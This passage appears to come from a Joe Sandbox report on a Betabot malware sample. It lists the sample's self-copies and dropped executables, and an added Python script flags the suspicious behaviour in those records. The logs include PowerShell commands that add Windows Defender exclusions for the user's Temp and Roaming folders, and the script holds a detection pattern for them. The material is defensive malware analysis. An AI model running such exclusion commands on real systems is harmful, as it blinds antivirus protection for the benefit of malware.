                                        • Rule: JoeSecurity_Betabot, Description: Yara detected Betabot, Source: 0000001A.00000002.556445822.0000000004470000.00000040.00000001.sdmp, Author: Joe Security
                                        Reputation:moderate
                                        Start time:11:42:20
                                        Start date:10/03/2021
                                        Path:C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe
                                        Wow64 process (32bit):true
                                        Commandline:
                                        Imagebase:0x11c0000
                                        File size:909312 bytes
                                        MD5 hash:77276DDC82248473D033E2494C438A97
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_Betabot, Description: Yara detected Betabot, Source: 0000001D.00000002.526598639.0000000004000000.00000040.00000001.sdmp, Author: Joe Security
                                        Reputation:moderate
                                        Start time:11:42:22
                                        Start date:10/03/2021
                                        Path:C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe
                                        Wow64 process (32bit):true
                                        Commandline:'C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe'
                                        Imagebase:0x400000
                                        File size:852996 bytes
                                        MD5 hash:2CED2C14EECE71C72C5E45E8A607BB4C
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Start time:11:42:23
                                        Start date:10/03/2021
                                        Path:C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe
                                        Wow64 process (32bit):true
                                        Commandline:'C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe'
                                        Imagebase:0x400000
                                        File size:852996 bytes
                                        MD5 hash:2CED2C14EECE71C72C5E45E8A607BB4C
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_Betabot, Description: Yara detected Betabot, Source: 00000020.00000002.299241171.00000000008C0000.00000040.00000001.sdmp, Author: Joe Security
                                        Start time:11:42:27
                                        Start date:10/03/2021
                                        Path:C:\Users\user\AppData\Local\Temp\9sek3aw7533q9_1.exe
                                        Wow64 process (32bit):true
                                        Commandline:/suac
                                        Imagebase:0x400000
                                        File size:852996 bytes
                                        MD5 hash:2CED2C14EECE71C72C5E45E8A607BB4C
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Antivirus matches:
                                        • Detection: 100%, Joe Sandbox ML
                                        • Detection: 40%, ReversingLabs
                                        Start time:11:42:29
                                        Start date:10/03/2021
                                        Path:C:\Users\user\AppData\Local\Temp\iom7q73oi.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Users\user\AppData\Local\Temp\iom7q73oi.exe
                                        Imagebase:0x400000
                                        File size:45056 bytes
                                        MD5 hash:08CDFD0D3A406601C42F087DA16EC6C8
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:Visual Basic
                                        Antivirus matches:
                                        • Detection: 100%, Avira
                                        • Detection: 21%, ReversingLabs
                                        Start time:11:42:30
                                        Start date:10/03/2021
                                        Path:C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe
                                        Wow64 process (32bit):true
                                        Commandline:'C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe'
                                        Imagebase:0x400000
                                        File size:852996 bytes
                                        MD5 hash:2CED2C14EECE71C72C5E45E8A607BB4C
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Start time:11:42:31
                                        Start date:10/03/2021
                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        Wow64 process (32bit):false
                                        Commandline:'C:\Windows\sysnative\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\'
                                        Imagebase:0x7ff679040000
                                        File size:447488 bytes
                                        MD5 hash:95000560239032BC68B4C2FDFCDEF913
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:.Net C# or VB.NET
                                        Start time:11:42:32
                                        Start date:10/03/2021
                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        Wow64 process (32bit):false
                                        Commandline:'C:\Windows\sysnative\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\'
                                        Imagebase:0x7ff6bbfa0000
                                        File size:447488 bytes
                                        MD5 hash:95000560239032BC68B4C2FDFCDEF913
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:.Net C# or VB.NET
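The two powershell.exe records above are what the "Adds a directory exclusion to Windows Defender" signature in the summary refers to. Both run as the 64-bit System32 binary (Wow64 process: false) yet are invoked through C:\Windows\sysnative\, the file-system redirection alias that only exists for 32-bit processes, which is how the WoW64 Betabot parent reached the native PowerShell; Add-MpPreference needs the administrator privileges every process in this chain reports. The excluded directories include the Temp folder that the dropped 9sek3aw7533q9_1.exe and iom7q73oi.exe run from, and the copies in ProgramData and Temp carry the MD5 of the submitted sample. The script below is an added example, not part of the Joe Sandbox report or of Joe Security's tooling: it parses abbreviated "Key:Value" process records constructed from the listing above (the record format, the rule names and the helper names are this example's own assumptions) and flags those three observations so the same checks can be run over any process list in this layout.

```python
"""Triage a sandbox report's process list for Defender exclusions added via
Add-MpPreference, self-copies of the submitted sample, and elevated binaries
running from user-writable directories.

Added example for this page; not part of the Joe Sandbox report or of Joe
Security's tooling.  Record format, rule names and helpers are assumptions.
"""
from __future__ import annotations

import re
from dataclasses import dataclass

# Constructed from the process records above, abbreviated to the four fields
# this script reads.  A new record starts at each "Path:" line.
SAMPLE_RECORDS = """\
Path:C:\\ProgramData\\Google Updater 2.0\\9sek3aw7533q9.exe
Commandline:'C:\\ProgramData\\Google Updater 2.0\\9sek3aw7533q9.exe'
MD5 hash:2CED2C14EECE71C72C5E45E8A607BB4C
Has administrator privileges:true
Path:C:\\Users\\user\\AppData\\Local\\Temp\\9sek3aw7533q9_1.exe
Commandline:/suac
MD5 hash:2CED2C14EECE71C72C5E45E8A607BB4C
Has administrator privileges:true
Path:C:\\Users\\user\\AppData\\Local\\Temp\\iom7q73oi.exe
Commandline:C:\\Users\\user\\AppData\\Local\\Temp\\iom7q73oi.exe
MD5 hash:08CDFD0D3A406601C42F087DA16EC6C8
Has administrator privileges:true
Path:C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
Commandline:'C:\\Windows\\sysnative\\WindowsPowerShell\\v1.0\\powershell.exe' Add-MpPreference -ExclusionPath 'C:\\Users\\user\\AppData\\Roaming\\'
MD5 hash:95000560239032BC68B4C2FDFCDEF913
Has administrator privileges:true
Path:C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
Commandline:'C:\\Windows\\sysnative\\WindowsPowerShell\\v1.0\\powershell.exe' Add-MpPreference -ExclusionPath 'C:\\Users\\user\\AppData\\Local\\Temp\\'
MD5 hash:95000560239032BC68B4C2FDFCDEF913
Has administrator privileges:true
"""

SUBMITTED_MD5 = "2ced2c14eece71c72c5e45e8a607bb4c"  # MD5 from the report header

# Any Add-MpPreference switch that widens the exclusion list, followed by a
# single-quoted, double-quoted or bare value.  PowerShell is case-insensitive.
EXCLUSION_RE = re.compile(
    r"Add-MpPreference\b.*?-Exclusion(Path|Process|Extension|IpAddress)\s+"
    r"(?:'([^']*)'|\"([^\"]*)\"|(\S+))",
    re.IGNORECASE,
)

# Locations a standard user can write to; an elevated binary here is worth a
# look whatever its hash.
USER_WRITABLE_PREFIXES = ("c:\\programdata\\", "c:\\users\\")


@dataclass
class Finding:
    rule: str
    path: str
    detail: str


def parse_records(text: str) -> list[dict[str, str]]:
    """Turn 'Key:Value' lines into one dict per process.  Split on the first
    colon only, so drive-letter values such as C:\\... stay intact."""
    records: list[dict[str, str]] = []
    for line in text.splitlines():
        if ":" not in line:
            continue
        key, value = line.split(":", 1)
        key = key.strip()
        if key == "Path":
            records.append({})
        if records:
            records[-1][key] = value.strip()
    return records


def find_defender_exclusions(records: list[dict[str, str]]) -> list[Finding]:
    """Processes whose command line grows the Defender exclusion list."""
    findings = []
    for rec in records:
        m = EXCLUSION_RE.search(rec.get("Commandline", ""))
        if m:
            value = next(g for g in m.groups()[1:] if g is not None)
            rule = "defender-exclusion:" + m.group(1).lower()
            findings.append(Finding(rule, rec["Path"], value))
    return findings


def find_sample_copies(records: list[dict[str, str]], submitted_md5: str) -> list[Finding]:
    """Executables byte-identical to the submitted sample (same MD5) that run
    from a user-writable directory: the sample copied itself to disk."""
    return [
        Finding("sample-copy", rec["Path"], rec.get("Commandline", ""))
        for rec in records
        if rec.get("MD5 hash", "").lower() == submitted_md5.lower()
        and rec["Path"].lower().startswith(USER_WRITABLE_PREFIXES)
    ]


def find_admin_from_writable(records: list[dict[str, str]]) -> list[Finding]:
    """Elevated processes whose image lives in a user-writable directory."""
    return [
        Finding("admin-from-writable-dir", rec["Path"], rec.get("MD5 hash", ""))
        for rec in records
        if rec["Path"].lower().startswith(USER_WRITABLE_PREFIXES)
        and rec.get("Has administrator privileges", "").lower() == "true"
    ]


def triage(text: str, submitted_md5: str) -> list[Finding]:
    """Run every rule over a process listing and return all findings."""
    records = parse_records(text)
    return (find_defender_exclusions(records)
            + find_sample_copies(records, submitted_md5)
            + find_admin_from_writable(records))


if __name__ == "__main__":
    for f in triage(SAMPLE_RECORDS, SUBMITTED_MD5):
        print(f"{f.rule:28} {f.path}  [{f.detail}]")
```

The exclusion rule keys on the cmdlet and switch rather than on the quoted path, so it also catches -ExclusionProcess and -ExclusionExtension variants and unquoted arguments; the self-copy rule needs the submitted sample's MD5 from the report header, which here matches the two 852996-byte copies but not the 45056-byte Visual Basic dropper iom7q73oi.exe.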

                                        Disassembly

                                        Code Analysis